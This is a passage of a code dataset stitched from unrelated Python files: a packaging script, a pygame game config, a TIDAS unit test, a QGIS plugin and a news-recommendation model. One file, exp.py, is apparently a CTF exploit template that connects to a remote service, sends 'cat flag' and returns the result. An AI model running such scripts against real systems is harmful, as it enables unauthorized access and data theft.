long_description = f.read()\n\nsetup(\n name=\"gym-ignition-models\",\n author=\"Diego Ferigo\",\n author_email=\"diego.ferigo@iit.it\",\n description=\"Additional robot models for RL simulations\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n license=\"LGPL\",\n platforms='any',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Operating System :: POSIX :: Linux\",\n \"Topic :: Games/Entertainment :: Simulation\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Framework :: Robot Framework\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)\",\n ],\n use_scm_version={\n 'local_scheme': 
'dirty-tag',\n },\n setup_requires=['setuptools_scm'],\n python_requires='>=3.6',\n keywords=\"robot model robotics humanoid simulation urdf sdf icub\",\n packages=find_packages(),\n package_data={'gym_ignition_models': [\n 'meshes/*.*',\n 'meshes/**/*.*',\n 'meshes/**/**/*.*',\n '*/meshes/*.*',\n '*/meshes/**/*.*',\n '*/meshes/**/**/*.*',\n '*/*.sdf',\n '*/*.urdf',\n '*/model.config',\n ]},\n ext_modules=[CopyMeshes()],\n cmdclass={\n 'build_ext': BuildExtension,\n },\n url=\"https://github.com/dic-iit/gym-ignition-models\",\n)\n","sub_path":"pypi_install_script/gym-ignition-models-0.1.dev74.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"557511189","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom pwn import*\nimport adlog\nimport ConfigParser\nconf = ConfigParser.ConfigParser()\nconf.read(\"config.ini\")\nport = conf.get('config', 'process_port')\n##################### load config ###############\n\n\ndef exp(ip, port): # don't add interactive in last script\n n = remote(ip, port)\n\n # you exp\n return readflag(n, \"cat flag\")\n\n\ndef readflag(n, payload):\n n.sendline(payload)\n flag = n.recvline()\n n.close()\n return flag\n# The flag have '\\n' Please remove '\\n' it when you submit it.\n","sub_path":"exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"353065184","text":"import pygame\npygame.init()\nimport math\nfrom pygame import mixer\n\n# creating the screen\nscreen=pygame.display.set_mode((1700,1000))\n\n# Title and icon\npygame.display.set_caption(\"River Crossing Challenge\")\nicon=pygame.image.load('logo.png')\npygame.display.set_icon(icon)\n\n#Setting up clock variable\nclock = pygame.time.Clock()\nfont = pygame.font.Font('freesansbold.ttf',25)\nframe_count = 0\nframe_rate = 60\n\n#Background Sound\nmixer.music.load('bensound-energy-1.mp3')\nmixer.music.play(-1)\n\n#Player\nplayerImg = pygame.image.load('diver.png')\nplayerX = 825\nplayerY = 1000\nplayerX_change = 0 \nplayerY_change = 0\n\n#creating all the dynamic enemies\nenemyImg=pygame.image.load('enemy.png')\ncrocodileImg=pygame.image.load('shark.png')\nstartImg=pygame.image.load('start.png')\nendImg=pygame.image.load('end.png')\nobsImg=pygame.image.load('skull.png')\n\n#Enemy1\nenemy1X = 0\nenemy1Y = 70\nenemy1X_change = 2\nenemy1Y_change = 0\n\n#Enemy2\nenemy2X = 860\nenemy2Y = 110\nenemy2X_change = 2\nenemy2Y_change = 0\n\n#Enemy3\nenemy3X = 0\nenemy3Y = 250\nenemy3X_change = 2.2\nenemy3Y_change = 0\n\n#Enemy4\nenemy4X = 1700\nenemy4Y = 310\nenemy4X_change = 2.2\nenemy4Y_change = 0\n\n#Crocodile1\ncroc1X = 1700\ncroc1Y = 500\ncroc1X_change = 1\ncroc1Y_change = 0\n\n#Enemy5\nenemy5X = 0\nenemy5Y = 450\nenemy5X_change = 1\nenemy5Y_change = 0\n \n#Enemy6\nenemy6X = 0 \nenemy6Y = 660\nenemy6X_change = 2.5\nenemy6Y_change = 0\n\n#Crocodile2\ncroc2X = 1700\ncroc2Y = 870\ncroc2X_change = 2\ncroc2Y_change = 0\n\n#Static 
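One detail worth flagging in the gym-ignition-models setup.py record above: FROM_ORIG_TO_DEST is a dict literal whose two entries share the identical f-string key, so Python silently keeps only the second mapping and the "iCubGazeboV2_5/meshes" copy never happens. A sketch of one fix, assuming the intent was to copy the shared meshes into both model folders, is to use a list of (source, destination) pairs instead of a dict keyed by source:

SHARED_MESH_DIR = "meshes"

# A dict literal with duplicate keys keeps only the last value, so
# mapping one source to several destinations needs a list of pairs
# (or a dict keyed by destination rather than source).
FROM_ORIG_TO_DEST = [
    (f"{SHARED_MESH_DIR}/iCubGazeboV2_5", "iCubGazeboV2_5/meshes"),
    (f"{SHARED_MESH_DIR}/iCubGazeboV2_5", "iCubGazeboSimpleCollisionsV2_5/meshes"),
]

for orig, dest in FROM_ORIG_TO_DEST:
    print(orig, "->", dest)  # both copies are now preserved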
Obstacles\n\n#obs1\nobs1X=625\nobs1Y=-3\n\n#obs2\nobs2X=825+200\nobs2Y=-3\n\n#obs3\nobs3X=525\nobs3Y=-3+194\n\n#obs4\nobs4X=1125\nobs4Y=-3+194\n\n#obs5\nobs5X=125\nobs5Y=-3+194*2\n\n#obs6\nobs6X=825\nobs6Y=-3+194*2\n\n#obs7\nobs7X=1525\nobs7Y=-3+194*2\n\n#obs8\nobs8X=425\nobs8Y=-3+194*3\n\n#obs9\nobs9X=1225\nobs9Y=-3+194*3\n\n#obs10\nobs10X=125\nobs10Y=-3+194*4\n\n#obs11\nobs11X=825\nobs11Y=-3+194*4\n\n#obs12\nobs12X=1525\nobs12Y=-3+194*4\n\n#Score\nscore_value = 0\nfont = pygame.font.Font('freesansbold.ttf',32)\ntext1X = 10\ntext1Y = 10\ntext2X=10\ntext2Y=60\ni=0\nj=0\np=0\nq=0\n\n#Time\nminutes1=0\nseconds1=0\nminutes2=0\nseconds2=0\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"531971627","text":"# Copyright (c) 2015-2017 by the parties listed in the AUTHORS file.\n# All rights reserved. Use of this source code is governed by \n# a BSD-style license that can be found in the LICENSE file.\n\nfrom ..mpi import MPI\nfrom .mpi import MPITestCase\n\nimport sys\nimport os\nimport re\nimport shutil\n\nimport unittest\n\nimport numpy as np\nimport numpy.testing as nt\n\nfrom ..dist import *\n\nfrom .. import qarray as qa\n\nfrom ..tod import tidas_available\nfrom ..tod import Interval\n\nif tidas_available:\n from tidas.mpi_volume import MPIVolume\n from ..tod import tidas as tt\n\n\nclass TidasTest(MPITestCase):\n\n def setUp(self):\n self.outdir = \"toast_test_output\"\n if self.comm.rank == 0:\n if not os.path.isdir(self.outdir):\n os.mkdir(self.outdir)\n self.outvol = os.path.join(self.outdir, \"test_tidas\")\n self.export = os.path.join(self.outdir, \"export_tidas\")\n self.rate = 20.0\n\n # Properties of the observations\n self.nobs = 6\n self.obslen = 3600.0\n self.obsgap = 600.0\n\n self.obstotalsamp = int(0.5 + (self.obslen + self.obsgap) \n * self.rate) + 1\n self.obssamp = int(0.5 + self.obslen * self.rate) + 1\n self.obsgapsamp = self.obstotalsamp - self.obssamp\n\n self.obstotal = (self.obstotalsamp - 1) / self.rate\n self.obslen = (self.obssamp - 1) / self.rate\n self.obsgap = (self.obsgapsamp - 1) / self.rate\n \n # Properties of the intervals within an observation\n self.nsub = 5\n self.subtotsamp = self.obssamp // self.nsub\n self.subgapsamp = 0\n self.subsamp = self.subtotsamp - self.subgapsamp\n\n # Detectors\n self.dets = [\n \"d100-1a\",\n \"d100-1b\",\n \"d145-2a\",\n \"d145-2b\",\n \"d220-3a\",\n \"d220-3b\"\n ]\n\n self.detquats = {}\n for d in self.dets:\n self.detquats[d] = np.array([0,0,0,1], dtype=np.float64)\n\n # Skip the rest of the setup if we don't have tidas.\n if not tidas_available:\n return\n\n # Group schema\n self.schm = tt.create_tidas_schema(self.dets, \"float64\", \"volts\")\n\n\n def tearDown(self):\n pass\n \n\n def meta_setup(self):\n ret = {}\n ret[\"string\"] = \"blahblahblah\"\n ret[\"double\"] = -123456789.0123\n ret[\"float\"] = -123456789.0123\n ret[\"int8\"] = -100\n ret[\"uint8\"] = 100\n ret[\"int16\"] = -10000\n ret[\"uint16\"] = 10000\n ret[\"int32\"] = -1000000000\n ret[\"uint32\"] = 1000000000\n ret[\"int64\"] = -100000000000\n ret[\"uint64\"] = 100000000000\n return ret\n\n\n def meta_verify(self, dct):\n nt.assert_equal(dct[\"string\"], \"blahblahblah\")\n nt.assert_equal(dct[\"int8\"], -100)\n nt.assert_equal(dct[\"uint8\"], 100)\n nt.assert_equal(dct[\"int16\"], -10000)\n nt.assert_equal(dct[\"uint16\"], 10000)\n nt.assert_equal(dct[\"int32\"], -1000000000)\n 
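The pygame config.py record above declares every moving obstacle as numbered globals (enemy1X, enemy1Y, enemy1X_change, ...). A hedged refactoring sketch, with illustrative names and an assumed wrap-around movement rule (the record's actual game loop is not shown here), keeps the same state in one iterable structure so movement and collision code can loop instead of repeating itself:

# Illustrative alternative: one record per moving obstacle instead of
# numbered globals, so the update code can iterate.
enemies = [
    {"x": 0,    "y": 70,  "dx": 2.0, "dy": 0},
    {"x": 860,  "y": 110, "dx": 2.0, "dy": 0},
    {"x": 0,    "y": 250, "dx": 2.2, "dy": 0},
    {"x": 1700, "y": 310, "dx": 2.2, "dy": 0},
]

def step(enemies, width=1700):
    for e in enemies:
        e["x"] = (e["x"] + e["dx"]) % width  # assumed: wrap around screen
        e["y"] += e["dy"]

step(enemies)
print(enemies[0]["x"])  # 2.0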
nt.assert_equal(dct[\"uint32\"], 1000000000)\n nt.assert_equal(dct[\"int64\"], -100000000000)\n nt.assert_equal(dct[\"uint64\"], 100000000000)\n nt.assert_almost_equal(dct[\"float\"], -123456789.0123)\n nt.assert_almost_equal(dct[\"double\"], -123456789.0123)\n return\n\n\n def create_intervals(self, start, first):\n ret = []\n for i in range(self.nsub):\n ifirst = i * self.subtotsamp\n if i == self.nsub - 1:\n ilast = self.obssamp - 1\n else:\n ilast = (i+1) * self.subtotsamp - 1\n istart = float(ifirst) / self.rate\n istop = float(ilast) / self.rate\n ret.append(Interval(\n start=(start + istart),\n stop=(start + istop), \n first=(first + ifirst), \n last=(first + ilast)))\n return ret\n\n\n def intervals_init(self, start, first):\n return self.create_intervals(start, first)\n\n\n def intervals_verify(self, ilist, start, first):\n reg = self.create_intervals(start, first)\n nt.assert_equal(len(ilist), len(reg))\n for i in range(len(ilist)):\n nt.assert_almost_equal(ilist[i].start, reg[i].start)\n nt.assert_equal(ilist[i].first, reg[i].first)\n return\n\n\n def create_bore(self, total, local):\n theta_incr = (0.5*np.pi) / (total - 1)\n phi_incr = (2.0*np.pi) / (total - 1)\n\n theta_start = local[0] * theta_incr\n phi_start = local[0] * phi_incr\n\n theta_stop = theta_start + (local[1] - 1) * theta_incr\n phi_stop = phi_start + (local[1] - 1) * phi_incr\n\n theta = np.linspace(theta_start, theta_stop, num=local[1], \n endpoint=True, dtype=np.float64)\n phi = np.linspace(phi_start, phi_stop, num=local[1], \n endpoint=True, dtype=np.float64)\n pa = np.zeros(local[1], dtype=np.float64)\n\n return qa.from_angles(theta, phi, pa)\n\n\n def obs_init(self, vol, parent, name, start, first):\n\n # fake metadata\n props = self.meta_setup()\n props = tt.encode_tidas_quats(self.detquats, props=props)\n\n # create intervals\n ilist = self.intervals_init(start, 0)\n\n # create the observation within the TIDAS volume\n\n obs = tt.create_tidas_obs(vol, parent, name, \n groups={\n \"detectors\" : (self.schm, self.obssamp, props)\n }, \n intervals={\n \"chunks\" : (len(ilist), dict())\n })\n\n # write the intervals that will be used for data distribution\n if vol.comm.rank == 0:\n obs.intervals_get(\"chunks\").write(ilist)\n\n # instantiate a TOD for this observation\n\n tod = tt.TODTidas(vol.comm, vol, \"{}/{}\".format(parent, name), \n detgroup=\"detectors\", distintervals=\"chunks\")\n\n # Now write the data. For this test, we simple write the detector\n # index (as a float) to the detector timestream. We also flag every\n # other sample. For the boresight pointing, we create a fake spiral\n # pattern.\n\n if vol.comm.rank == 0:\n # number of samples\n n = tod.total_samples\n\n # Write some simple timestamps\n incr = 1.0 / self.rate\n stamps = np.arange(n, dtype=np.float64)\n stamps *= incr\n stamps += start\n\n tod.write_times(stamps=stamps)\n\n # boresight\n boresight = self.create_bore(n, (0,n))\n tod.write_boresight(data=boresight)\n\n # flags. 
We use this for both the common and all the detector\n # flags just to check write/read roundtrip.\n flags = np.zeros(n, dtype=np.uint8)\n flags[::2] = 1\n\n tod.write_common_flags(flags=flags)\n\n # detector data\n fakedata = np.empty(n, dtype=np.float64)\n for d in tod.detectors:\n # get unique detector index and convert to float\n indx = float(tod.detindx[d])\n # write this to all local elements\n fakedata[:] = indx\n tod.write(detector=d, data=fakedata)\n # write detector flags\n tod.write_det_flags(detector=d, flags=flags)\n\n # FIXME: consider doing this in parallel once either TIDAS supports\n # that or there is a toast-specific workaround to serialize I/O to a\n # single HDF5 file.\n #\n # # number of local samples\n # nlocal = tod.local_samples[1]\n\n # # Write some simple timestamps\n # stamps = np.arange(nlocal, dtype=np.float64)\n # stamps /= self.rate\n # stamps += start + (tod.local_samples[0] / self.rate)\n\n # tod.write_times(stamps=stamps)\n\n # # boresight\n # boresight = self.create_bore(tod.total_samples, tod.local_samples)\n # tod.write_boresight(boresight)\n\n # # flags. We use this for both the common and all the detector\n # # flags just to check write/read roundtrip.\n # flags = np.zeros(nlocal, dtype=np.uint8)\n # flags[::2] = 1\n\n # tod.write_common_flags(flags=flags)\n\n # # detector data\n # fakedata = np.empty(nlocal, dtype=np.float64)\n # for d in range(len(self.dets)):\n # # get unique detector index and convert to float\n # indx = float(tod.detindx[d])\n # # write this to all local elements\n # fakedata[:] = indx\n # tod.write(detector=self.dets[d], data=fakedata)\n # # write detector flags\n # tod.write_det_flags(detector=self.dets[d], flags=flags)\n\n return\n\n\n def obs_verify(self, tod, start, first):\n nlocal = tod.local_samples[1]\n odd = False\n if tod.local_samples[0] % 2 != 0:\n odd = True\n\n # Read the intervals and compare\n\n intr = tod.block.intervals_get(\"chunks\")\n ilist = intr.read()\n self.intervals_verify(ilist, start, 0)\n\n # Verify group properties\n\n self.meta_verify(tod.group.props)\n\n # Read and compare timestamps\n\n compstamps = np.arange(nlocal, dtype=np.float64)\n compstamps /= self.rate\n compstamps += start + (tod.local_samples[0] / self.rate)\n\n stamps = tod.read_times()\n\n nt.assert_almost_equal(stamps, compstamps)\n\n # Read and compare boresight\n\n compbore = self.create_bore(tod.total_samples, tod.local_samples)\n boresight = tod.read_boresight()\n\n nt.assert_almost_equal(boresight, compbore)\n\n # flags. We use this for both the common and all the detector\n # flags just to check write/read roundtrip.\n\n compflags = np.zeros(nlocal, dtype=np.uint8)\n if odd:\n compflags[1::2] = 1\n else:\n compflags[::2] = 1\n\n flags = tod.read_common_flags()\n\n nt.assert_equal(flags, compflags)\n\n # detector data\n\n compdata = np.empty(nlocal, dtype=np.float64)\n for d in tod.local_dets:\n # get unique detector index and convert to float\n indx = float(tod.detindx[d])\n # comparison values\n compdata[:] = indx\n # read and check\n data = tod.read(detector=d)\n nt.assert_almost_equal(data, compdata)\n # check detector flags\n flags, cflags = tod.read_flags(detector=d)\n nt.assert_equal(flags, compflags)\n\n return\n\n\n def volume_init(self, path):\n if self.comm.rank == 0:\n if os.path.isdir(path):\n shutil.rmtree(path)\n self.comm.barrier()\n\n with MPIVolume(self.comm, path, backend=\"hdf5\", comp=\"none\") as vol:\n # Usually for real data we will have a hierarchy of blocks \n # (year, month, season, etc). 
For this test we just add generic\n # observations to the root block.\n for ob in range(self.nobs):\n obsname = \"obs_{:02d}\".format(ob)\n start = ob * self.obstotal\n first = ob * self.obstotalsamp\n self.obs_init(vol, \"\", obsname, start, first)\n return\n\n \n def volume_verify(self, path):\n with MPIVolume(self.comm, path) as vol:\n root = vol.root()\n for ob in range(self.nobs):\n obsname = \"obs_{:02d}\".format(ob)\n obs = root.block_get(obsname)\n start = ob * self.obstotal\n first = ob * self.obstotalsamp\n tod = tt.TODTidas(self.comm, vol, \"/{}\".format(obsname), \n detgroup=\"detectors\", distintervals=\"chunks\")\n self.obs_verify(tod, start, first)\n return\n\n\n @unittest.skipIf(not tidas_available, \"TIDAS not found\")\n def test_io(self):\n start = MPI.Wtime()\n\n self.volume_init(self.outvol)\n self.volume_verify(self.outvol)\n\n stop = MPI.Wtime()\n elapsed = stop - start\n #print(\"Proc {}: test took {:.4f} s\".format( MPI.COMM_WORLD.rank, elapsed ))\n\n\n @unittest.skipIf(not tidas_available, \"TIDAS not found\")\n def test_export(self):\n start = MPI.Wtime()\n\n self.volume_init(self.outvol)\n\n worldsize = self.comm.size\n if (worldsize >= 2):\n groupsize = int( worldsize / 2 )\n ngroup = 2\n else:\n groupsize = 1\n ngroup = 1\n toastcomm = Comm(self.comm, groupsize=groupsize)\n\n distdata = tt.load_tidas(toastcomm, self.outvol, mode=\"r\",\n distintervals=\"chunks\")\n\n if self.comm.rank == 0:\n if os.path.isdir(self.export):\n shutil.rmtree(self.export)\n self.comm.barrier()\n\n dumper = tt.OpTidasExport(self.export, usedist=True)\n dumper.exec(distdata)\n\n self.volume_verify(self.export)\n\n stop = MPI.Wtime()\n elapsed = stop - start\n #print(\"Proc {}: test took {:.4f} s\".format( MPI.COMM_WORLD.rank, elapsed ))\n\n","sub_path":"src/python/tests/tidas.py","file_name":"tidas.py","file_ext":"py","file_size_in_byte":13006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652929630","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n SMC\n A QGIS plugin\n This plugin selects every feature inside the current extent\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\n -------------------\n begin : 2020-07-17\n git sha : $Format:%H$\n copyright : (C) 2020 by Infogeo54\n email : hvitoux@departement54.fr\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. 
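The TIDAS test record above distributes each observation of obssamp samples over nsub interval chunks of subtotsamp = obssamp // nsub samples, with the final chunk absorbing the remainder. A standalone sketch of that boundary arithmetic, mirroring create_intervals():

def chunk_bounds(n_samples, n_sub):
    # First/last sample index of each chunk; the final chunk absorbs the
    # remainder, exactly as create_intervals() does in the test above.
    sub = n_samples // n_sub
    bounds = []
    for i in range(n_sub):
        first = i * sub
        last = n_samples - 1 if i == n_sub - 1 else (i + 1) * sub - 1
        bounds.append((first, last))
    return bounds

# obssamp for a 3600 s observation at 20 Hz: int(0.5 + 3600*20) + 1
print(chunk_bounds(72001, 5))
# [(0, 14399), (14400, 28799), (28800, 43199), (43200, 57599), (57600, 72000)]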
*\n * *\n ***************************************************************************/\n\"\"\"\nfrom qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication, Qt\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtWidgets import QAction, QApplication\nfrom qgis.core import QgsProject, QgsFeatureRequest, QgsVectorLayer\n\n# Initialize Qt resources from file resources.py\nfrom .resources import *\n# Import the code for the dialog\nfrom .smc_dialog import SMCDialog\nfrom .utils import ui\nimport os.path\n\n\nclass SMC:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'SMC_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&SMC')\n\n # Check if plugin was started the first time in current QGIS session\n # Must be set in initGui() to survive plugin reloads\n self.first_start = None\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('SMC', message)\n\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. 
Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n # Adds plugin icon to Plugins toolbar\n self.iface.addToolBarIcon(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = ':/plugins/smc/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'SMC'),\n callback=self.run,\n parent=self.iface.mainWindow())\n\n # will be set False in run()\n self.first_start = True\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginMenu(\n self.tr(u'&SMC'),\n action)\n self.iface.removeToolBarIcon(action)\n\n def fill_table(self, communes):\n \"\"\"\n Fill the \"Communes\" table\n :param communes: List - Communes to insert in the table\n \"\"\"\n rows, table = sorted(ui.create_rows(communes), key=lambda k: k[\"label\"]), self.dlg.tw_communes\n table.setRowCount(len(rows))\n for index, row in enumerate(rows):\n table.setItem(index, 0, row[\"label\"])\n table.setItem(index, 1, row[\"checkbox\"])\n\n def selected_communes_names(self):\n \"\"\"\n Returns selected \"Communes\" names\n :return: List - Selected \"Communes\" names\n \"\"\"\n res, table = [], self.dlg.tw_communes\n for row in range(table.rowCount()):\n is_selected = table.item(row, 1).checkState() == Qt.Checked\n if is_selected:\n res.append(table.item(row, 0).text())\n return res\n\n def selected_communes(self, communes):\n \"\"\"\n Returns the Feature instance of every selected \"Commune\"\n :param communes: QgsVectorLayer - The \"Communes\" layer\n :return: List - The Feature instance list for every selected \"Commune\"\n \"\"\"\n selected_communes_names = self.selected_communes_names()\n return [c for c in list(communes.getFeatures()) if c.attribute(\"nom\") in selected_communes_names]\n\n def select(self, communes):\n \"\"\"\n Performs the feature selection\n :param communes: QgsVectorLayer - The \"Communes\" layer\n \"\"\"\n QApplication.setOverrideCursor(Qt.WaitCursor)\n layers = [l for l in QgsProject.instance().mapLayers().values() if l.type() == 0 and l.name() != \"Communes\"]\n if self.dlg.cb_exclude.checkState() == Qt.Checked:\n root = QgsProject.instance().layerTreeRoot()\n basemaps_nodes = root.findGroup(\"Fonds de plan\").findLayers()\n basemaps_layers = [node.layer() for node in basemaps_nodes]\n layers = [l for l in QgsProject.instance().mapLayers().values() if l.type() == 0 and l not in basemaps_layers]\n for l in layers:\n for c in self.selected_communes(communes):\n expression = \"within($geometry, geom_from_wkt('{wkt}'))\".format(wkt=c.geometry().asWkt())\n l.selectByExpression(expression, 1)\n QApplication.restoreOverrideCursor()\n self.dlg.close()\n\n def run(self):\n \"\"\"Run method that performs all the real work\"\"\"\n\n extent = self.iface.mapCanvas().extent()\n communes = next((l for l in QgsProject.instance().mapLayersByName(\"Communes\")))\n visible_communes = communes.getFeatures(QgsFeatureRequest(extent))\n\n if self.first_start:\n self.first_start = False\n self.dlg = SMCDialog()\n\n # Event listeners\n 
self.dlg.btn_cancel.clicked.connect(self.dlg.close)\n self.dlg.btn_validate.clicked.connect(lambda: self.select(communes))\n\n self.fill_table(visible_communes)\n\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass\n","sub_path":"smc.py","file_name":"smc.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"365291595","text":"import torch\nfrom model.NRMS.news_encoder import NewsEncoder\nfrom model.NRMS.user_encoder import UserEncoder\nfrom model.general.click_predictor.dot_product import DotProductClickPredictor\n\n\nclass NRMS(torch.nn.Module):\n \"\"\"\n NRMS network.\n Input 1 + K candidate news and a list of user clicked news, produce the click probability.\n \"\"\"\n def __init__(self, config, pretrained_word_embedding=None, writer=None):\n super(NRMS, self).__init__()\n self.config = config\n self.news_encoder = NewsEncoder(config, pretrained_word_embedding)\n self.user_encoder = UserEncoder(config)\n self.click_predictor = DotProductClickPredictor()\n\n def forward(self, candidate_news, clicked_news):\n \"\"\"\n Args:\n candidate_news:\n [\n {\n \"title\": Tensor(batch_size) * num_words_title\n } * (1 + K)\n ]\n clicked_news:\n [\n {\n \"title\":Tensor(batch_size) * num_words_title\n } * num_clicked_news_a_user\n ]\n Returns:\n click_probability: batch_size, 1 + K\n \"\"\"\n # 1 + K, batch_size, word_embedding_dim\n candidate_news_vector = torch.stack(\n [self.news_encoder(x) for x in candidate_news])\n # batch_size, num_clicked_news_a_user, word_embedding_dim\n clicked_news_vector = torch.stack(\n [self.news_encoder(x) for x in clicked_news], dim=1)\n # batch_size, word_embedding_dim\n user_vector = self.user_encoder(clicked_news_vector)\n # batch_size, 1 + K\n click_probability = torch.stack([\n self.click_predictor(x, user_vector) for x in candidate_news_vector\n ],\n dim=1)\n return click_probability\n\n def get_news_vector(self, news):\n \"\"\"\n Args:\n news:\n {\n \"title\": Tensor(batch_size) * num_words_title\n },\n Returns:\n (shape) batch_size, word_embedding_dim\n \"\"\"\n # batch_size, word_embedding_dim\n return self.news_encoder(news)\n\n def get_user_vector(self, clicked_news_vector):\n \"\"\"\n Args:\n clicked_news_vector: batch_size, num_clicked_news_a_user, word_embedding_dim\n Returns:\n (shape) batch_size, word_embedding_dim\n \"\"\"\n # batch_size, word_embedding_dim\n return self.user_encoder(clicked_news_vector)\n\n def get_prediction(self, news_vector, user_vector):\n \"\"\"\n Args:\n news_vector: word_embedding_dim\n user_vector: word_embedding_dim\n Returns:\n click_probability: 0-dim tensor\n \"\"\"\n # 0-dim tensor\n click_probability = self.click_predictor(\n news_vector.unsqueeze(dim=0),\n user_vector.unsqueeze(dim=0)).squeeze(dim=0)\n return click_probability\n","sub_path":"src/model/NRMS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59684124","text":"'''\n\nThis program is to show quality preferences when extra data\nabout the quality of neighbourhood is available\n\n'''\nfrom pyqtree import Index\n\n\nclass Dataset:\n def getType(self,type):\n \tif(type == 0):\n \t\treturn 'feature'\n \telif(type == 1):\n \t\treturn 'star'\n 
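The NRMS record above imports DotProductClickPredictor, whose source is not part of this record. From the forward pass (one call per candidate-news vector, each shaped batch_size x embedding_dim), the predictor appears to reduce a candidate vector and the user vector to one score per batch element; a minimal sketch under that assumption:

import torch

def dot_product_click_score(news_vector, user_vector):
    # news_vector, user_vector: (batch_size, embedding_dim).
    # Returns one unnormalized click score per batch element.
    return (news_vector * user_vector).sum(dim=1)

news = torch.randn(4, 300)
user = torch.randn(4, 300)
print(dot_product_click_score(news, user).shape)  # torch.Size([4])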
